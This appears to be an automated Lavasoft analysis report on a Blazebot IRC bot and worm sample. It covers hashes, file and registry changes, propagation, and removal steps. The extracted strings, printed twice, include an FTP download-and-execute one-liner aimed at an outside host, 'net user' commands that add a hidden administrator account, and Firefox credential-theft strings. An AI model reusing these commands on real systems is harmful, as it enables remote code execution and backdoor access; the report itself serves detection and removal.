Trojan.GenericKD.1502930_5f88c77cf9
Trojan.Win32.Blazebot.rx (Kaspersky), Trojan.GenericKD.1502930 (AdAware), GenericMSNWorm.YR, GenericAutorunWorm.YR, GenericIRCBot.YR, GenericProxy.YR, Blazebot.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, WormAutorun, IRCBot, MSNWorm, Trojan-Proxy
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: 5f88c77cf972bdf975061b2aa2f2ca0b
SHA1: 97120284a26bb5d688a5bc692b3acd924957ef16
SHA256: 29ecb1b5e5520b4696ba41cefb32c76eb11666e35358ab7a49bd0f3b062c6ee4
SSDeep: 12288: K2mhAMJ/cPlkRdFBQ/BKhqp3oP5fQEPqybOJ CFOck42Fc3w0yv3xb/a/DlUdWp:v2O/GlkPrQ8qlIfvPrOnQ453wrIDqWp
Size: 493254 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-06-09 16:19:49
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
| Behaviour | Description |
|---|---|
| WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer. |
| IRCBot | A bot can communicate with command and control servers via IRC channel. |
| MSNWorm | A worm can spread its copies through the MSN Messanger. |
| Trojan-Proxy | This program can launch a proxy server (SOCKS4) on a designated TCP port. |
Process activity
The Trojan creates the following process(es):
%original file name%.exe:556
msn.exe:1108
msn.exe:1116
The Trojan injects its code into the following process(es):
csrss.exe:2000
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:556 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\J60T\msn.exe (10785 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\J60T\__tmp_rar_sfx_access_check_831796 (0 bytes)
The process msn.exe:1108 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\aut1.tmp (1137 bytes)
%Documents and Settings%\%current user%\F52C60.FZ6 (601 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\aut1.tmp (0 bytes)
%Documents and Settings%\%current user%\F52C60.FZ6 (0 bytes)
The process msn.exe:1116 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\csrss.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
Registry activity
The process %original file name%.exe:556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 26 D8 4A 02 B5 A0 92 CA 45 82 F7 15 4E 1D 1D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\J60T]
"msn.exe" = "msn"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process msn.exe:1108 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC A7 54 4F 3D 3E DA A7 59 A2 38 1E 27 39 BA 0E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process msn.exe:1116 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 E9 3F 6B 22 3A C6 E8 56 7B 10 A7 3A E9 37 CF"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Remote Registry Service" = "csrss.exe"
Dropped PE files
| MD5 | File path |
|---|---|
| 6aadc6de54cd56742c37dd560726d44f | c:\Documents and Settings\"%CurrentUserName%"\J60T\msn.exe |
| 6aadc6de54cd56742c37dd560726d44f | c:\WINDOWS\csrss.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
A worm can spread its copies through the MSN Messanger.
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 74526 | 74752 | 4.54396 | a8692f5ba740240ef0f9a827376f76f9 |
| .rdata | 81920 | 7445 | 7680 | 3.46159 | d4f36accffde0bf520f52486679ccf0d |
| .data | 90112 | 96036 | 512 | 2.46008 | b6c7edb5b7fec47a37a622cc5d71f3f4 |
| .CRT | 188416 | 32 | 512 | 0.273198 | 439411041ee0b8261668525c5c132cd9 |
| .rsrc | 192512 | 16064 | 16384 | 3.70725 | 526a297a00c9477204aa2ebe90adcfb4 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
No activity has been detected.
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Web Traffic was not found.
The Trojan connects to the servers at the folowing location(s):
.text
`.rdata
@.data
.rsrc
t1SSSSh
SSSh8
PSShB
msn.msg
msn.stop
login
firefox
join
USERENV.dll
VkKeyScanA
keybd_event
USER32.dll
ole32.dll
OLEAUT32.dll
TransactNamedPipe
GetWindowsDirectoryA
KERNEL32.dll
MSVCRT.dll
_acmdln
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
WS2_32.dll
ntpass
Exploit FTPD: %d, Total: %d.
%s: %d,
%s Exploit Statistics:
cmd /c echo open jayne.p0rn-lover.us 8989 > i &echo user upload upload >> i &echo binary >> i &echo get rundat.exe >> i &echo quit >> i &ftp -n -s:i &rundat.exe&del i
%s.%s.%s.%s
%s Scan not active.
%s Current IP: %s.
%s Server started, Port: %i, File: %s.
%d.%d.%d.%d
%s Finished at %s:%d after %d minute(s) of scanning.
%s %s:%d, Scan thread: %d, Sub-thread: %d.
%s Failed to initialize critical section, error: <%d>
%s Portscan: %s:%d open.
Failed auth by %s(%s@%s)
Whats up %s? Im ready to rock!
Spy: %s!%s@%s (PM: "%s")
Fail by: %s!%s@%s (Pass Tried: %s)
%s out.
%s already running: <%d>.
Failed to start thread %s, error: <%d>.
[Current task] %s [System uptime] %s [Bot Uptime] %s
Bot installed on: %s.
Go fuck yourself %s.
MSN// Message & Zipfile sent to: %d contacts.
Hey got new sex Pics from me %d. realy Sexy!
MSN// Sent Stats - Messages: %d :: Files: %d :: Message & Files: %d.
Removed by: %s!%s@%s
Advapi.dll Failed
PStore.dll Failed.
%s Failed to parse command.
%s Failed to start scan thread, error: <%d>.
%s %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
%s No subnet class specified, try "-a" or "-b" or "-c"
%s Could not parse external IP.
%s Trying to get external IP.
%s Failed to start scan, no IP specified.
%d.x.x.x
%s Failed to start scan, port is invalid.
%s Already scanning with %d threads. Too many specified.
Updating from %s (%s)
%stempfile%d%d%d%d%d.exe
PTF://%s:%s@%s:%s/%s path: %s
sftp
net localgroup Administrateurs ASP.NET /add
net localgroup Administradors ASP.NET /add
net localgroup Administratoren ASP.NET /add
net localgroup Administrator ASP.NET /add
net localgroup Administrators ASP.NET /add
net user ASP.NET hardcore /add
SYN: Failed to start thread,error: (%d).
SYN: --> (%s:%s) for (%s secs).
FUCKING: --> (%s:%s) for (%s secs).
Downloading %s and saving it to: %s.
Failed to start socks4 daemon (%s)
Socks(4) server started on %s:%i
Starting firefox pstore
FIREFOX Threads
Process Finished: "%s", Total Running Time: %s.
File executed: %s
Unable to create process: "%s"
%s Couldn't parse path, error: <%d>
%.1fkb downloaded to %s (%.1fkbps)
Couldn't open file for writing: %s.
Windows for Workgroups 3.1a
WORKGROUPlQPxf2ISQgEV1bGKWindows 2000 2195
Windows 2000 5.0
Windows 2000 2195
PK11_CheckUserPassword
PK11_GetInternalKeySlot
softokn3.dll
sqlite3.dll
nssutil3.dll
plds4.dll
nspr4.dll
mozcrt19.dll
nss3.dll
plc4.dll
%s %s:%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
\profiles.ini
Application Data\Mozilla\Firefox
signons3.txt
signons2.txt
signons1.txt
pipe\epmapper
\\%s\
Windows 5.1
Windows 5.0
Windows 2000 LAN Manager*
NT LAN Manager *.*
Windows Server 2003 *.*
%s File transfer complete to IP: %s.
%s File transfer complete to IP: %s, File: %s, Size: %s bytes, Total sends: %i.
%s Started send to IP: %s.
200 PORT command successful.
PORT
%s %s LIST request from: %s
425 Passive not supported on this server
215 StnyFtpd
331 Password required
%s %s
%s Couldn't open data connection to: %s:%i, error: <%d>.
Ping Timeout? (%d-%d)%d/%d
Login list completed!
<%i> %s!%s@%s
Logins:
USER TbT * 0 :%s
NICK %s
{%s-%s-%s-%s-%s}{iNF-%s-%s-%s-%s-%s}nigzss.txt
TskMultiChatForm.UnicodeClass
__oxFrame.class__
PASS %s
QUIT %s
PONG %s
NICK
PRIVMSG
JOIN
NOTICE %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s %s
PART %s
[%s|%s]
shlwapi.dll
pstorec.dll
psapi.dll
userenv.dll
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
ShellExecuteA
shell32.dll
mpr.dll
GetUdpTable
GetTcpTable
iphlpapi.dll
dnsapi.dll
netapi32.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
FtpPutFileA
FtpGetFileA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
RegEnumKeyExA
advapi32.dll
user32.dll
kernel32.dll
%s!%s@%s
NICK {%s-%s-%s-%s-%s}https:/
http:/
csrss.exe
*!*@fbi.edu
||FTP||
jayne.p0rn-lover.us
rundat.exe
vids.p0rn-lover.us
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
%s\%s
%s Done @ (%iKB Sec)
No %s thread found.
%s thread stopped.
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}\Desktop.ini
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
hXXp://VVV.whatismyip.com
hXXp://checkip.dyndns.org
del "%s">nul
if exist "%s" goto Repeat
ping 0.0.0.0>nul
%s\removeMe%i%i%i%i.bat
%s%%s
%d day%s (%0.2d hours & %0.2d mins)
192.168.11.128
csrss.exe_2000_rwx_00400000_0005A000:
.text
`.rdata
@.data
.rsrc
t1SSSSh
SSSh8
PSShB
msn.msg
msn.stop
login
firefox
join
USERENV.dll
VkKeyScanA
keybd_event
USER32.dll
ole32.dll
OLEAUT32.dll
TransactNamedPipe
GetWindowsDirectoryA
KERNEL32.dll
MSVCRT.dll
_acmdln
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
WS2_32.dll
ntpass
Exploit FTPD: %d, Total: %d.
%s: %d,
%s Exploit Statistics:
cmd /c echo open jayne.p0rn-lover.us 8989 > i &echo user upload upload >> i &echo binary >> i &echo get rundat.exe >> i &echo quit >> i &ftp -n -s:i &rundat.exe&del i
%s.%s.%s.%s
%s Scan not active.
%s Current IP: %s.
%s Server started, Port: %i, File: %s.
%d.%d.%d.%d
%s Finished at %s:%d after %d minute(s) of scanning.
%s %s:%d, Scan thread: %d, Sub-thread: %d.
%s Failed to initialize critical section, error: <%d>
%s Portscan: %s:%d open.
Failed auth by %s(%s@%s)
Whats up %s? Im ready to rock!
Spy: %s!%s@%s (PM: "%s")
Fail by: %s!%s@%s (Pass Tried: %s)
%s out.
%s already running: <%d>.
Failed to start thread %s, error: <%d>.
[Current task] %s [System uptime] %s [Bot Uptime] %s
Bot installed on: %s.
Go fuck yourself %s.
MSN// Message & Zipfile sent to: %d contacts.
Hey got new sex Pics from me %d. realy Sexy!
MSN// Sent Stats - Messages: %d :: Files: %d :: Message & Files: %d.
Removed by: %s!%s@%s
Advapi.dll Failed
PStore.dll Failed.
%s Failed to parse command.
%s Failed to start scan thread, error: <%d>.
%s %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
%s No subnet class specified, try "-a" or "-b" or "-c"
%s Could not parse external IP.
%s Trying to get external IP.
%s Failed to start scan, no IP specified.
%d.x.x.x
%s Failed to start scan, port is invalid.
%s Already scanning with %d threads. Too many specified.
Updating from %s (%s)
%stempfile%d%d%d%d%d.exe
PTF://%s:%s@%s:%s/%s path: %s
sftp
net localgroup Administrateurs ASP.NET /add
net localgroup Administradors ASP.NET /add
net localgroup Administratoren ASP.NET /add
net localgroup Administrator ASP.NET /add
net localgroup Administrators ASP.NET /add
net user ASP.NET hardcore /add
SYN: Failed to start thread,error: (%d).
SYN: --> (%s:%s) for (%s secs).
FUCKING: --> (%s:%s) for (%s secs).
Downloading %s and saving it to: %s.
Failed to start socks4 daemon (%s)
Socks(4) server started on %s:%i
Starting firefox pstore
FIREFOX Threads
Process Finished: "%s", Total Running Time: %s.
File executed: %s
Unable to create process: "%s"
%s Couldn't parse path, error: <%d>
%.1fkb downloaded to %s (%.1fkbps)
Couldn't open file for writing: %s.
Windows for Workgroups 3.1a
WORKGROUPlQPxf2ISQgEV1bGKWindows 2000 2195
Windows 2000 5.0
Windows 2000 2195
PK11_CheckUserPassword
PK11_GetInternalKeySlot
softokn3.dll
sqlite3.dll
nssutil3.dll
plds4.dll
nspr4.dll
mozcrt19.dll
nss3.dll
plc4.dll
%s %s:%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
\profiles.ini
Application Data\Mozilla\Firefox
signons3.txt
signons2.txt
signons1.txt
pipe\epmapper
\\%s\
Windows 5.1
Windows 5.0
Windows 2000 LAN Manager*
NT LAN Manager *.*
Windows Server 2003 *.*
%s File transfer complete to IP: %s.
%s File transfer complete to IP: %s, File: %s, Size: %s bytes, Total sends: %i.
%s Started send to IP: %s.
200 PORT command successful.
PORT
%s %s LIST request from: %s
425 Passive not supported on this server
215 StnyFtpd
331 Password required
%s %s
%s Couldn't open data connection to: %s:%i, error: <%d>.
Ping Timeout? (%d-%d)%d/%d
Login list completed!
<%i> %s!%s@%s
Logins:
USER TbT * 0 :%s
NICK %s
{%s-%s-%s-%s-%s}{iNF-%s-%s-%s-%s-%s}nigzss.txt
TskMultiChatForm.UnicodeClass
__oxFrame.class__
PASS %s
QUIT %s
PONG %s
NICK
PRIVMSG
JOIN
NOTICE %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s %s
PART %s
[%s|%s]
shlwapi.dll
pstorec.dll
psapi.dll
userenv.dll
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
ShellExecuteA
shell32.dll
mpr.dll
GetUdpTable
GetTcpTable
iphlpapi.dll
dnsapi.dll
netapi32.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
FtpPutFileA
FtpGetFileA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
RegEnumKeyExA
advapi32.dll
user32.dll
kernel32.dll
%s!%s@%s
NICK {%s-%s-%s-%s-%s}https:/
http:/
csrss.exe
*!*@fbi.edu
||FTP||
jayne.p0rn-lover.us
rundat.exe
vids.p0rn-lover.us
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
%s\%s
%s Done @ (%iKB Sec)
No %s thread found.
%s thread stopped.
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}\Desktop.ini
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
hXXp://VVV.whatismyip.com
hXXp://checkip.dyndns.org
del "%s">nul
if exist "%s" goto Repeat
ping 0.0.0.0>nul
%s\removeMe%i%i%i%i.bat
%s%%s
%d day%s (%0.2d hours & %0.2d mins)
192.168.11.128
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:556
msn.exe:1108
msn.exe:1116 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\J60T\msn.exe (10785 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut1.tmp (1137 bytes)
%Documents and Settings%\%current user%\F52C60.FZ6 (601 bytes)
%WinDir%\csrss.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Remote Registry Service" = "csrss.exe" - Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
